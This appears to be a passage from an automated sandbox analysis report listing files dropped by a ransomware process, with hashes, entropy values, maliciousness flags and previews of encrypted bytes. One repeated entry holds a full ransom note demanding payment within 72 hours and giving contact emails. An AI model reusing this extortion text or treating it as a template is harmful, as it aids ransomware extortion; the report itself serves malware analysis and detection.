                                                                                                                                              Preview:fY.w~Q..t.f.....g..e$.>w1,1.3....p..YK...SD....,...",.p..&xfN...~8....Y..BWUq..u.........>k..>;.......5+)......Y..o..J.{....e.aQ...@.(..J.psk..F%.f4..W...[..n...0.*...h..Z.k.\.%'.a.#/B..@.....4-F(....<.q.Y.........ND0...7ub.8=....d..+.;.t.M...g.-c.k...\y...g..\.............$eD......Z,bi..>U.....Z.aN!i.V..".:.h8..,.v......e.[>....N.N.J......|S....*|..L...#..Z.......I..0...p.....r(......?..9.yZx!h...6.F...3......z1U.0..k5..S7c..P]i...6.l~.I..J.\=........-kqs...&....4N_...i.Z.1...@......U.V.|9.....L..x..F..2Pk~..f.}.WQZ.q...../.G...C.R.s..i....kG..........5.........t...i...Y.c.u ....ZW_......00.z..Q.2...B@{Z......H.#|)..A._..(..O..c...s....d?.o... ..JR1.?..:....T...YB.....`...j...<...y..y.....I...iXv,A...(..1.....+&.Td]x..."..~+.....i...T50n..9].:.*A..7.......<nR.5~...%..2d.=n..Z.K6..L...o..*....q....X.:.M"n/a"}}}$O.6.rF..dw.Lp1..P.\A........C....D1...O3.tf]U.+..<.,F.K1..=&.._.6...8.K........^........r.......*..*...........uG...~.
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1138
                                                                                                                                              Entropy (8bit):7.84184867760871
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:1WbXRxiEZI32Vij0wMS9dk6+mEBSd5CbCHzJ1bLfivrToj4YT:49jih9CJtl+HzDa4H
                                                                                                                                              MD5:A11F88AA496F5BFD3B5516DB2B581DED
                                                                                                                                              SHA1:2E835B57D47522D2268182EFD8AA726E5657C9C9
                                                                                                                                              SHA-256:C248C45F64322E8531111DA53ED85D7ADE68BC20E11853D4858A22EAD7A498DF
                                                                                                                                              SHA-512:142E949B575C693E2BF3D990D33B4C9F270911A3D1EBAA8AC545B9E10CB94D4D216E77EA1CD2ED695346AABD99E004769DB7E9CEF4ABAA84642CDE8DB5537FA0
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:fY.w~Q..t.f.....g..e$.>w1,1.3....p..YK...SD....,...",.p..&xfN...~8....Y..BWUq..u.........>k..>;.......5+)......Y..o..J.{....e.aQ...@.(..J.psk..F%.f4..W...[..n...0.*...h..Z.k.\.%'.a.#/B..@.....4-F(....<.q.Y.........ND0...7ub.8=....d..+.;.t.M...g.-c.k...\y...g..\.............$eD......Z,bi..>U.....Z.aN!i.V..".:.h8..,.v......e.[>....N.N.J......|S....*|..L...#..Z.......I..0...p.....r(......?..9.yZx!h...6.F...3......z1U.0..k5..S7c..P]i...6.l~.I..J.\=........-kqs...&....4N_...i.Z.1...@......U.V.|9.....L..x..F..2Pk~..f.}.WQZ.q...../.G...C.R.s..i....kG..........5.........t...i...Y.c.u ....ZW_......00.z..Q.2...B@{Z......H.#|)..A._..(..O..c...s....d?.o... ..JR1.?..:....T...YB.....`...j...<...y..y.....I...iXv,A...(..1.....+&.Td]x..."..~+.....i...T50n..9].:.*A..7.......<nR.5~...%..2d.=n..Z.K6..L...o..*....q....X.:.M"n/a"}}}$O.6.rF..dw.Lp1..P.\A........C....D1...O3.tf]U.+..<.,F.K1..=&.._.6...8.K........^........r.......*..*...........uG...~.
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:COM executable for DOS
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1390
                                                                                                                                              Entropy (8bit):7.84353037122765
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:5ELXpAKYoCDiPXZ07fDib0C/vCBqyCJ/cLj5WpfaUfCYRwn0Fzs8lxSJEEpHR5:WzpxXXZ0ixn0X4CAfag2n0FzsfJE8T
                                                                                                                                              MD5:7457C955FEEF673446991A97AC3AD999
                                                                                                                                              SHA1:41517735D79F32BFA887300968545CD78EE8158F
                                                                                                                                              SHA-256:6574A1BC1FD192F825F786CF327D15BED3C23B1442918E280A0EE9C4AE29A966
                                                                                                                                              SHA-512:9C1616995EE07A8FAA91A2A461F23FA23764E3CEA5C6EEDFAC9CD668803E6ECA2783B39AFB26E5E8DF781DC012B6786AB0A199639CA8D5937FD14DB96D004968
                                                                                                                                              Malicious:true
                                                                                                                                              Preview:..p..W..(&....}~...6Q..G..$.Q5..w...p......Z[.j.'*.S......W.x..6..Q...-.......?[%....i...<..........~xY.?#'...?.HuE..z<d..n..<.8n.C.6y.:....].6...S.b..,..T..A.U`.\.R.....8w..6.i...[...ZL)..X{&..a/.^.$a.CY&.....L..y..q~.....;.....A.8.@..!.C.H<..$K.E.z..2...A<..wx...|...V....DN.6.T.KZ.z.J......P.-uR.km...*...5...F_.8<p;....X-..X...:?.E...D.i.[.X........W.M<...n...~..J.^Njr..%.6.5........L.DaxM....%......u.w..v.'....I.H...&.0n...n.......{,.....*..d.~.7.).)n..........C...b..mSe.CL&H..].!.:.Q.t..Q.cs..jC8......... W.D..<...../..h....0.*.B.v.];.yod....P..~/..Tvm...`u7.MD....3(*...w.i.x_..,..0..h...!jR.3."c.v.).qC0%Z...Ht.H?...^l..W.......v......E.#m..M..1.n.&..n... R.r$....cy........x..N.Cd.3v..E.U..lZ....%.Ek..J..0.G_a..O...z....P.;......y".v....E...A.:..3".e..xl.:#W...O...h=Pp.9...../.$....lkW:..O$.D.^.[`...:... ...9.d..kDY..G..r...Q-..."....).7Ax01.... .....j&s.~u....>..k@...Er.....s..v^._b...Z...)D..fw'.....Ey.+./. ...s&......{.yV
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:COM executable for DOS
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1390
                                                                                                                                              Entropy (8bit):7.84353037122765
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:5ELXpAKYoCDiPXZ07fDib0C/vCBqyCJ/cLj5WpfaUfCYRwn0Fzs8lxSJEEpHR5:WzpxXXZ0ixn0X4CAfag2n0FzsfJE8T
                                                                                                                                              MD5:7457C955FEEF673446991A97AC3AD999
                                                                                                                                              SHA1:41517735D79F32BFA887300968545CD78EE8158F
                                                                                                                                              SHA-256:6574A1BC1FD192F825F786CF327D15BED3C23B1442918E280A0EE9C4AE29A966
                                                                                                                                              SHA-512:9C1616995EE07A8FAA91A2A461F23FA23764E3CEA5C6EEDFAC9CD668803E6ECA2783B39AFB26E5E8DF781DC012B6786AB0A199639CA8D5937FD14DB96D004968
                                                                                                                                              Malicious:true
                                                                                                                                              Preview:..p..W..(&....}~...6Q..G..$.Q5..w...p......Z[.j.'*.S......W.x..6..Q...-.......?[%....i...<..........~xY.?#'...?.HuE..z<d..n..<.8n.C.6y.:....].6...S.b..,..T..A.U`.\.R.....8w..6.i...[...ZL)..X{&..a/.^.$a.CY&.....L..y..q~.....;.....A.8.@..!.C.H<..$K.E.z..2...A<..wx...|...V....DN.6.T.KZ.z.J......P.-uR.km...*...5...F_.8<p;....X-..X...:?.E...D.i.[.X........W.M<...n...~..J.^Njr..%.6.5........L.DaxM....%......u.w..v.'....I.H...&.0n...n.......{,.....*..d.~.7.).)n..........C...b..mSe.CL&H..].!.:.Q.t..Q.cs..jC8......... W.D..<...../..h....0.*.B.v.];.yod....P..~/..Tvm...`u7.MD....3(*...w.i.x_..,..0..h...!jR.3."c.v.).qC0%Z...Ht.H?...^l..W.......v......E.#m..M..1.n.&..n... R.r$....cy........x..N.Cd.3v..E.U..lZ....%.Ek..J..0.G_a..O...z....P.;......y".v....E...A.:..3".e..xl.:#W...O...h=Pp.9...../.$....lkW:..O$.D.^.[`...:... ...9.d..kDY..G..r...Q-..."....).7Ax01.... .....j&s.~u....>..k@...Er.....s..v^._b...Z...)D..fw'.....Ey.+./. ...s&......{.yV
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1579
                                                                                                                                              Entropy (8bit):7.862950540732025
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:48:y/M09xeksfGtOBvJF5TBLdwpIYWpmZZifVogP:cMsxeDhF5TXwpIPpmnif5
                                                                                                                                              MD5:8F694AD9171DD1B11B4BA9E78F4D0631
                                                                                                                                              SHA1:E06A71B58857E2950CF553DF0DACD29C7E18A48E
                                                                                                                                              SHA-256:4BC5E71E5EE9D6929CCBBC41E45ACDF0124691F90E6FD3EBFE0F723B93E9433C
                                                                                                                                              SHA-512:5669A45D01C2781B239F93FCDDB16F97AF660E0F7C099592935E1556A300F1C1824991857BEAD3535CD7A2BB8D5947DE66BE2CDA550848738C7AADA93233804B
                                                                                                                                              Malicious:true
                                                                                                                                              Preview:pd.._......3!5Z......b.Y.._k......g.C.z.$.....?.....R..~..m.0..l.g....]....#.....s.g..TL....f..n.W\....la+:..'...%Q.t..7#6&./.v..0. .G ......4?......Jd.N.......l.U.M.s.Ph...Z...Z.:.%>.QQ...._.Ej.b?..U..@..m...\.......d.$.S.)...xJ...~...S..v...o.6....t...jy..r..f.47y.K....3^...mz...ce;9V.....aA ......c.~...n....l%w.h...M..s..1\s.......T..2.B.F1.f...D..."......k;+p....h.?.....$].,.....`b,K@I...N.$......K.v~J..X.^i...C..g..9m!@{...s.p;w%.....q....7V..k..."eG....|.[o....l.X.,C#Y.RCT9.)..5p.....".g.@..D....sc..5... $n.(7H...~.0F.L..%.Q.o....U6...c..m2U..B.\.......E..j@."$..1...\-.'*..a?~...e.'...F.".7....n*nsY.f..!5...;.I..V_.+.....9!Y.K.3B.R-7`p......gH..w.V..Bs..?.......!....d.CY.Z..H...jq...sJ......A.@.3...%.}.<,.....mP..V.M@&..4QJ..mJT...=v?B.....p."...x@#H.Tm...|.a..c..*P.l.n../....7W..o9S..Y....Q.s.H..f....U..c....9......5...s..id15.wW..;.%*./Pg/..q.+...N<=MI...x?....K"..2.J.....#....r..Q....(\..>....... jb.A....Mg,.BO{......8..
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1579
                                                                                                                                              Entropy (8bit):7.862950540732025
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:48:y/M09xeksfGtOBvJF5TBLdwpIYWpmZZifVogP:cMsxeDhF5TXwpIPpmnif5
                                                                                                                                              MD5:8F694AD9171DD1B11B4BA9E78F4D0631
                                                                                                                                              SHA1:E06A71B58857E2950CF553DF0DACD29C7E18A48E
                                                                                                                                              SHA-256:4BC5E71E5EE9D6929CCBBC41E45ACDF0124691F90E6FD3EBFE0F723B93E9433C
                                                                                                                                              SHA-512:5669A45D01C2781B239F93FCDDB16F97AF660E0F7C099592935E1556A300F1C1824991857BEAD3535CD7A2BB8D5947DE66BE2CDA550848738C7AADA93233804B
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:pd.._......3!5Z......b.Y.._k......g.C.z.$.....?.....R..~..m.0..l.g....]....#.....s.g..TL....f..n.W\....la+:..'...%Q.t..7#6&./.v..0. .G ......4?......Jd.N.......l.U.M.s.Ph...Z...Z.:.%>.QQ...._.Ej.b?..U..@..m...\.......d.$.S.)...xJ...~...S..v...o.6....t...jy..r..f.47y.K....3^...mz...ce;9V.....aA ......c.~...n....l%w.h...M..s..1\s.......T..2.B.F1.f...D..."......k;+p....h.?.....$].,.....`b,K@I...N.$......K.v~J..X.^i...C..g..9m!@{...s.p;w%.....q....7V..k..."eG....|.[o....l.X.,C#Y.RCT9.)..5p.....".g.@..D....sc..5... $n.(7H...~.0F.L..%.Q.o....U6...c..m2U..B.\.......E..j@."$..1...\-.'*..a?~...e.'...F.".7....n*nsY.f..!5...;.I..V_.+.....9!Y.K.3B.R-7`p......gH..w.V..Bs..?.......!....d.CY.Z..H...jq...sJ......A.@.3...%.}.<,.....mP..V.M@&..4QJ..mJT...=v?B.....p."...x@#H.Tm...|.a..c..*P.l.n../....7W..o9S..Y....Q.s.H..f....U..c....9......5...s..id15.wW..;.%*./Pg/..q.+...N<=MI...x?....K"..2.J.....#....r..Q....(\..>....... jb.A....Mg,.BO{......8..
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):4165
                                                                                                                                              Entropy (8bit):4.793237544333736
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:cvNlHaKqHidXtV8TTU+2SUw/6sJl0Xs403ay3Id7Hf:Qn6FH4eTU+2zwysJl0Xs40X4d7Hf
                                                                                                                                              MD5:4B259C0407539130EF482A2BA2704103
                                                                                                                                              SHA1:A679D0E6E16F132CD4709B175AC1647E9E98E8A4
                                                                                                                                              SHA-256:A1A7C610B7254AF2B5A7F8B905C2FAA1FE0EAFA68F6AFCF6F8D58B6FBB5B2CA7
                                                                                                                                              SHA-512:C91C60CB551598268328E43D98D5DC1F0FFCC8E3BEC9AAEB72AF0426E48F1912E479B3C955DC45286C47A1B742B6FC0FD4442446B6E4A83311696C2081F6348C
                                                                                                                                              Malicious:true
                                                                                                                                              Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :1B4910FA33AB622F7DC5D2AF0A960A05D154D5BC18A850AA28E4EFBAFFD77A4EA585193EAC8A427D137B0A23A019DFA2A7CE8D5EE6EB631E5F2FE2F9AE9B2C338BEC79491D4D2AD0DE16280DB3F138734412798A3519E1FDF6E6855423C
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1208
                                                                                                                                              Entropy (8bit):7.828596280190175
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:9UTbuGeB2GQVftDrpOGRD6tSjEDYSUViJANG07FlQQWMew:9QSBAf/fQQEDYFViOG0ZeA
                                                                                                                                              MD5:D86315DD4F820FCF71386ADA9F4EA82D
                                                                                                                                              SHA1:DCDA6DE533E12F117CADDAFDC32FF1A4A3CE9343
                                                                                                                                              SHA-256:C4B874FBFAB826A31D2DD1750BFFF190A867CD9FF5707E10671495674BF7B9EB
                                                                                                                                              SHA-512:C5C56B89C7B04D5009B7CCFABC12639A9282614426D56EF2AF299513E05E41AE71A56D0AD2AFACC024C1864F6A4C5D6D909D143CF709B3DC7576616E7ECA9EEC
                                                                                                                                              Malicious:true
                                                                                                                                              Preview:f>..yu.,.q...V.....VE..8...U.~.(..k.x4.!.Z.t...t.8C,..!.fDD......h..k......{'...V..d....M.u.OLKOp.:J.KP...G=k...}+....m5.#P.-*d...f.sRP.=.U....J.e....u.v].N..J=...P.)....#6..,.6.....|W...m..z..y.2.,...f.8>.W:.....R...iU...ua[{Ao.Y.....}.bK.q....Gd..y,.z&.h.l.<..J.S..."7Y..>.......V.o.......4-...x...s%....N....m5/.._../vb.u..I....n.....j....>#..4).^.g.P...wES].l......K.I..#+.O~P]C.!.pX.h.KGGB..1..J..D.D........e...#...1....QS|..'o.x#W*.^..#.^.\.g......;....]?P........=.'.S&.<..Y..O.........V...._....3.!.I.g...x/.;.C.%ipcr2J.....R..h....y..\....9;+'...0..}.a.2@.|Y..Q...uu...9..9(...k^.2......Egys.P...QJ..0....P...?./..2......l.v.}.6|LR.N\..C...G\e...YS6......&.H...!.T!..'@...5.oS"...~.....f....)V..k....b....6....<.0#3.Za.MW....S..C....eP.8.X.....A.`..X..!.......o..(..........U*.*.q_;..3/.c.z+......}...3.....e.......<.a8.O.eW.E.k...V...S6...Q}........~.6...f-.m..M%.....GaNH.nabled":true}}}=>.._...M..t../....dy....e...f.,.....|H>...)r..Y.O.|Uk?..Y
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1208
                                                                                                                                              Entropy (8bit):7.828596280190175
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:9UTbuGeB2GQVftDrpOGRD6tSjEDYSUViJANG07FlQQWMew:9QSBAf/fQQEDYFViOG0ZeA
                                                                                                                                              MD5:D86315DD4F820FCF71386ADA9F4EA82D
                                                                                                                                              SHA1:DCDA6DE533E12F117CADDAFDC32FF1A4A3CE9343
                                                                                                                                              SHA-256:C4B874FBFAB826A31D2DD1750BFFF190A867CD9FF5707E10671495674BF7B9EB
                                                                                                                                              SHA-512:C5C56B89C7B04D5009B7CCFABC12639A9282614426D56EF2AF299513E05E41AE71A56D0AD2AFACC024C1864F6A4C5D6D909D143CF709B3DC7576616E7ECA9EEC
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:f>..yu.,.q...V.....VE..8...U.~.(..k.x4.!.Z.t...t.8C,..!.fDD......h..k......{'...V..d....M.u.OLKOp.:J.KP...G=k...}+....m5.#P.-*d...f.sRP.=.U....J.e....u.v].N..J=...P.)....#6..,.6.....|W...m..z..y.2.,...f.8>.W:.....R...iU...ua[{Ao.Y.....}.bK.q....Gd..y,.z&.h.l.<..J.S..."7Y..>.......V.o.......4-...x...s%....N....m5/.._../vb.u..I....n.....j....>#..4).^.g.P...wES].l......K.I..#+.O~P]C.!.pX.h.KGGB..1..J..D.D........e...#...1....QS|..'o.x#W*.^..#.^.\.g......;....]?P........=.'.S&.<..Y..O.........V...._....3.!.I.g...x/.;.C.%ipcr2J.....R..h....y..\....9;+'...0..}.a.2@.|Y..Q...uu...9..9(...k^.2......Egys.P...QJ..0....P...?./..2......l.v.}.6|LR.N\..C...G\e...YS6......&.H...!.T!..'@...5.oS"...~.....f....)V..k....b....6....<.0#3.Za.MW....S..C....eP.8.X.....A.`..X..!.......o..(..........U*.*.q_;..3/.c.z+......}...3.....e.......<.a8.O.eW.E.k...V...S6...Q}........~.6...f-.m..M%.....GaNH.nabled":true}}}=>.._...M..t../....dy....e...f.,.....|H>...)r..Y.O.|Uk?..Y
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):3839
                                                                                                                                              Entropy (8bit):7.95702265435745
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:xecMXLfD2ugHuQPhlunleH0rIMHXyqSXX3u4ptHh5R:xe2juGhlunleH0rIMi/u4pZvR
                                                                                                                                              MD5:5FFAC0F5CAFE040D55BD10F7704D584A
                                                                                                                                              SHA1:163350003BFA3C5471FF5F066CB90293DFDAACF2
                                                                                                                                              SHA-256:E457E7746C85699E8D4BC6930B68F740A16C94D4EAB409D2425DD2604AD6B0B3
                                                                                                                                              SHA-512:496500C5D37F7A86779BF482D2877A0C3C2D3C40CA58190622A67BEDA22329DF7AF78CE7A840930FD9A5BABD6CDBBB3AB6DBB77A3C9C5B8FC59A9BA04A8DFACC
                                                                                                                                              Malicious:true
                                                                                                                                              Preview:....%..5.G?.m...9.A..t....o7E..H..).a..U.....U.V... ....>M..gu......f...../.s...,.6XQc.t8qM?.....!H....|.._:....w...~...W....8..q.UYVP...;'.P.5...Es...$...........5.#....SE...Z..l......Oy.P.G....6.U...@..w......P....,....3Kac1Z?.g.~.+..V(...N.5d......u..6....s#.............y.Z....q0..r}.9...y...2J.P&9.C...M....-...v...+..o.Ke.u.~..@8.C."...S...O.l...%...'<.*.hg.eU....co.....BL..i..67.*.w.{..p....L.(.v..M9E.~.$}...A2O.3....w.....l...m...^..@.F7!..U......|M..N...~.Y....G.....m..n"2..P.y.Z...n....:.,X......IB9=Ww...l....U...U..1CG-A...B.J..e..v...9... Qd>.@....A5.)..!f..~q...<..^?....;A..Q....2..r11....P.\..:..i..5.r..^.k.r.....{../D)......C.GN5.Z.8.....x..n.06.V...`}n...G..# *.4>.......oL...?Wq..4..i,.......p<..N)......I..#[..._....>..+.|..{+..[n.....!3h.**5gE..iD..b@......j!...m..r$.3.p.!...Uf.....s..90.KN.=.....M..K......g.....q.!x..oVt.0.F.+zw.@.........{..r......F.$....#.u.F9U..~l.I...........fl.x.Y.a..Ku.h.....@4.0..._.5pI.(.$...3....
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):3839
                                                                                                                                              Entropy (8bit):7.95702265435745
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:xecMXLfD2ugHuQPhlunleH0rIMHXyqSXX3u4ptHh5R:xe2juGhlunleH0rIMi/u4pZvR
                                                                                                                                              MD5:5FFAC0F5CAFE040D55BD10F7704D584A
                                                                                                                                              SHA1:163350003BFA3C5471FF5F066CB90293DFDAACF2
                                                                                                                                              SHA-256:E457E7746C85699E8D4BC6930B68F740A16C94D4EAB409D2425DD2604AD6B0B3
                                                                                                                                              SHA-512:496500C5D37F7A86779BF482D2877A0C3C2D3C40CA58190622A67BEDA22329DF7AF78CE7A840930FD9A5BABD6CDBBB3AB6DBB77A3C9C5B8FC59A9BA04A8DFACC
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:....%..5.G?.m...9.A..t....o7E..H..).a..U.....U.V... ....>M..gu......f...../.s...,.6XQc.t8qM?.....!H....|.._:....w...~...W....8..q.UYVP...;'.P.5...Es...$...........5.#....SE...Z..l......Oy.P.G....6.U...@..w......P....,....3Kac1Z?.g.~.+..V(...N.5d......u..6....s#.............y.Z....q0..r}.9...y...2J.P&9.C...M....-...v...+..o.Ke.u.~..@8.C."...S...O.l...%...'<.*.hg.eU....co.....BL..i..67.*.w.{..p....L.(.v..M9E.~.$}...A2O.3....w.....l...m...^..@.F7!..U......|M..N...~.Y....G.....m..n"2..P.y.Z...n....:.,X......IB9=Ww...l....U...U..1CG-A...B.J..e..v...9... Qd>.@....A5.)..!f..~q...<..^?....;A..Q....2..r11....P.\..:..i..5.r..^.k.r.....{../D)......C.GN5.Z.8.....x..n.06.V...`}n...G..# *.4>.......oL...?Wq..4..i,.......p<..N)......I..#[..._....>..+.|..{+..[n.....!3h.**5gE..iD..b@......j!...m..r$.3.p.!...Uf.....s..90.KN.=.....M..K......g.....q.!x..oVt.0.F.+zw.@.........{..r......F.$....#.u.F9U..~l.I...........fl.x.Y.a..Ku.h.....@4.0..._.5pI.(.$...3....
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):4165
                                                                                                                                              Entropy (8bit):4.793237544333736
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:cvNlHaKqHidXtV8TTU+2SUw/6sJl0Xs403ay3Id7Hf:Qn6FH4eTU+2zwysJl0Xs40X4d7Hf
                                                                                                                                              MD5:4B259C0407539130EF482A2BA2704103
                                                                                                                                              SHA1:A679D0E6E16F132CD4709B175AC1647E9E98E8A4
                                                                                                                                              SHA-256:A1A7C610B7254AF2B5A7F8B905C2FAA1FE0EAFA68F6AFCF6F8D58B6FBB5B2CA7
                                                                                                                                              SHA-512:C91C60CB551598268328E43D98D5DC1F0FFCC8E3BEC9AAEB72AF0426E48F1912E479B3C955DC45286C47A1B742B6FC0FD4442446B6E4A83311696C2081F6348C
                                                                                                                                              Malicious:true
                                                                                                                                              Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :1B4910FA33AB622F7DC5D2AF0A960A05D154D5BC18A850AA28E4EFBAFFD77A4EA585193EAC8A427D137B0A23A019DFA2A7CE8D5EE6EB631E5F2FE2F9AE9B2C338BEC79491D4D2AD0DE16280DB3F138734412798A3519E1FDF6E6855423C
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):427
                                                                                                                                              Entropy (8bit):7.456129995540507
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:12:7W06l3q2A6xe3NvTbPczS0ZAslEzhNRgCDLA3vAJs1n:7Wf3q2AbNQIs6zh8ae
                                                                                                                                              MD5:50AACA4F822566CB3F9DE59AACF654DB
                                                                                                                                              SHA1:B2B479ED7DB9759222EC447991EEC4311E869D4C
                                                                                                                                              SHA-256:9B050F659AB126C13F5079C8332994F55B66BA3F7C1E3D1A62ADAFDE29F1B482
                                                                                                                                              SHA-512:13E44EB639CAD9950A47895CD4CA2743C15215E8ECB959C30C569C58E40CE7008F014D19726CA5A11368B82160C1DC19A7A344C24373436FB9EACF1D38D2820E
                                                                                                                                              Malicious:true
                                                                                                                                              Preview:[..8Q.6.3n#...|9).7`z.^.'.(........k.H.9.p..(..-......G..H.S.!Rn...h..._....eW...8..G.G..)/......D..k..W\.e%c..C..R1.5...;...\...g......i[......@.b....L.}...^..RJq.."'.{...1.n....'.w..&...}...qE;Yp.?...2...F...J.y. L..#......:.. l.t1|w8.,.(A..w.9......N..#u..ko_&x...G\`..(.~..../.PB..RBy.*.xSA......ay.04.{.F.....C.......a7P.....0K....s...|..clzA...`.9Qy.._.!oD.9....@.......FkB...f..r.s.Z<.p.0xABADCABA
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):427
                                                                                                                                              Entropy (8bit):7.456129995540507
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:12:7W06l3q2A6xe3NvTbPczS0ZAslEzhNRgCDLA3vAJs1n:7Wf3q2AbNQIs6zh8ae
                                                                                                                                              MD5:50AACA4F822566CB3F9DE59AACF654DB
                                                                                                                                              SHA1:B2B479ED7DB9759222EC447991EEC4311E869D4C
                                                                                                                                              SHA-256:9B050F659AB126C13F5079C8332994F55B66BA3F7C1E3D1A62ADAFDE29F1B482
                                                                                                                                              SHA-512:13E44EB639CAD9950A47895CD4CA2743C15215E8ECB959C30C569C58E40CE7008F014D19726CA5A11368B82160C1DC19A7A344C24373436FB9EACF1D38D2820E
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:[..8Q.6.3n#...|9).7`z.^.'.(........k.H.9.p..(..-......G..H.S.!Rn...h..._....eW...8..G.G..)/......D..k..W\.e%c..C..R1.5...;...\...g......i[......@.b....L.}...^..RJq.."'.{...1.n....'.w..&...}...qE;Yp.?...2...F...J.y. L..#......:.. l.t1|w8.,.(A..w.9......N..#u..ko_&x...G\`..(.~..../.PB..RBy.*.xSA......ay.04.{.F.....C.......a7P.....0K....s...|..clzA...`.9Qy.._.!oD.9....@.......FkB...f..r.s.Z<.p.0xABADCABA
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):317
                                                                                                                                              Entropy (8bit):7.281205769864069
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6:SaCIxl4nELplBrBJU7xLYzVSA1QlX6ecS6e4S+TzGVzLuUhrSuY68x3aPk1jcn:Sa17BL9rBJU7KSMcvcvSmGVfh468xqc2
                                                                                                                                              MD5:0BE076B02C43616CC0B44B5E6986E06A
                                                                                                                                              SHA1:043BEC0EDA9CA11F4B53EC374019467BC373AECA
                                                                                                                                              SHA-256:4EA1EB4B7B25CC96E62267B591F1E2E095F50D2A814B7DB1AA60B0991E3FC9E5
                                                                                                                                              SHA-512:5D5FCA77EE9F96C95A56D3F8B9BE31ABCDBB09888BBF1D81697E09C0250E1EA3C64F5DC201094964FE62520EAA852E3AC6FF036B93319BB067305B5954657899
                                                                                                                                              Malicious:true
                                                                                                                                              Preview:.Ek ..W.G.b..t..IC..E..<.-I...[.O.*.6RO..@.$(u^Jc"}<.o.Z&....W..1....%.T&`.W..qS%V]...Z.;..(....:...v(..k.ez..?....K.1I....as/.s......1.zhV*..y~NO.....b..(.A.....Zy.......c t....U..p.P._a>.....A.X.=..|W.jd..N3cS..h........3.....{...j..8u..O...tbV..InJ..D...../.?..+W.]k_.6.F.*B..._...T........d...tSdI0xABADCABA
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):317
                                                                                                                                              Entropy (8bit):7.281205769864069
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6:SaCIxl4nELplBrBJU7xLYzVSA1QlX6ecS6e4S+TzGVzLuUhrSuY68x3aPk1jcn:Sa17BL9rBJU7KSMcvcvSmGVfh468xqc2
